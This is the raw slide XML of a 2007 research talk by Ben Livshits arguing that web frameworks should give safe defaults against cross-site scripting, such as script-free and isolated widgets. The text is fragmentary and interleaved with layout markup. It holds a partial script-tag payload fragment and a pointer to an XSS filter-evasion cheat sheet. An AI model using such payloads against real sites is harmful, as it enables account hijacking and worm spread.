            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)&lt;/script&gt;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9027758">
            <a:off x="1852893" y="1523139"/>
            <a:ext cx="51329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XSS </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16600" b="1" cap="none" spc="0" dirty="0">
              <a:ln w="2857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2187209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vulnerabilities are coding bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Making a mistake is very easy: default is often unsafe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Getting things right requires non-trivial effort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Can you blame the developer for getting it wrong?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Currently Developers Do All the Heavy Lifting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deal with problem complexity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Filter input to remove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&lt;script&gt;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To see how complex this is, check out XSS Cheat Sheet for filter evasion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://ha.ckers.org/xss.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need to find all ways that malicious input can propagate through the application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position: Turn Things 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5344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Secure code should be easier to write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>It should be the default, not an exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Developer has to go out of her way to get it wrong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>How to get there?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Most applications rely on frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Exploit frameworks to achieve better security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Applications built on top of frameworks get better security properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>by construction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“for free”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1447800" y="5562600"/>
            <a:ext cx="1905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Per-widget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safe defaults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Framework-supplied Safe Defaults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19200" y="4191000"/>
            <a:ext cx="1905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Per-widget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safe defaults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10400" y="5486400"/>
            <a:ext cx="19050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Client-side enforcement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="C:\Documents and Settings\livshits\Local Settings\Temporary Internet Files\Content.IE5\4T0UI6SQ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114800"/>
            <a:ext cx="955279" cy="1270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Striped Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="4419600"/>
            <a:ext cx="2971800" cy="762000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219200" y="33528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Framework libraries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19200" y="2514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Application code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" name="Cross 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3124200"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 376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qual 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4038600"/>
            <a:ext cx="685800" cy="3810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219200" y="4265612"/>
            <a:ext cx="2514600" cy="227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1" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="4419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Web application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5" name="Rectangular Callout 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="3124200"/>
            <a:ext cx="5257800" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20307"/>
              <a:gd name="adj2" fmla="val 835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000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sounds great… but how?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 BEEP [Jim et.al., WWW’07]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 JavaScript rewriting [Yu et.al., POPL’07]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 METS [Erlingsson et.al., HotOS’07]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MashupOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> [Howell et.al., HotOS’07]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 Extending same-origin policy [Livshits et.al., PLAS’07]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1166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3.33333E-6 0.1113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0.1111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444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11" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="1" animBg="1"/>
      <p:bldP spid="11" grpId="2" animBg="1"/>
      <p:bldP spid="11" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="21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Safe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indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>GUI widgets: units of screen real estate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="633222" indent="-514350"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="633222" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Explore following options for safe defaults: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Disallow JavaScript within a widget: no code, only data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Isolate content and JavaScript within a widget by default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Isolate content and JavaScript belonging to a set of widgets within a page by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80772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Safe Default # 1:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prohibit Script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3A9E-ED20-45ED-9568-A790BB115DEB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 with Comments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59565"/>
            <a:ext cx="7772400" cy="50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762000" y="3505200"/>
            <a:ext cx="7620000" cy="838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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="838200"/>
            <a:ext cx="3429000" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -37982"/>
              <a:gd name="adj2" fmla="val 68855"/>
            </a:avLst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Don’t want to allow JavaScript here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(this is how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>woms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> propagate)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1299</TotalTime>
  <Words>756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Towards Security By Construction for Web 2.0 Applications</vt:lpstr>
      <vt:lpstr>State of Web Application Security</vt:lpstr>
      <vt:lpstr>Default is Unsafe!</vt:lpstr>
      <vt:lpstr>Currently Developers Do All the Heavy Lifting</vt:lpstr>
      <vt:lpstr>Our position: Turn Things Around</vt:lpstr>
      <vt:lpstr>Framework-supplied Safe Defaults</vt:lpstr>
      <vt:lpstr>Three Types of Safe Defaults</vt:lpstr>
      <vt:lpstr>Safe Default # 1: Prohibit Script Execution</vt:lpstr>
      <vt:lpstr>Blog with Comments</vt:lpstr>
      <vt:lpstr>Email Client (Dojo Toolkit)</vt:lpstr>
      <vt:lpstr>Declaring a No-script Content Pane</vt:lpstr>
      <vt:lpstr>Safe Default # 2: Provide Content and Code Isolation</vt:lpstr>
      <vt:lpstr>Dojo Toolkit Email Client</vt:lpstr>
      <vt:lpstr>Mash-up Page Isolation Boundaries</vt:lpstr>
      <vt:lpstr>“Sealed” RSS News Item</vt:lpstr>
      <vt:lpstr>Safe Default # 3: Defaults for More Complex Widgets</vt:lpstr>
      <vt:lpstr>Tree Widgets in Dojo</vt:lpstr>
      <vt:lpstr>Enforcing Dojo Tree Isolation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Security By Construction for Web 2.0 Applications</dc:title>
  <dc:creator>Ben Livshits</dc:creator>
  <cp:lastModifiedBy>Ben Livshits</cp:lastModifiedBy>
  <cp:revision>111</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-05-23T03:52:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-05-24T20:40:24Z</dcterms:modified>
</cp:coreProperties>
</file>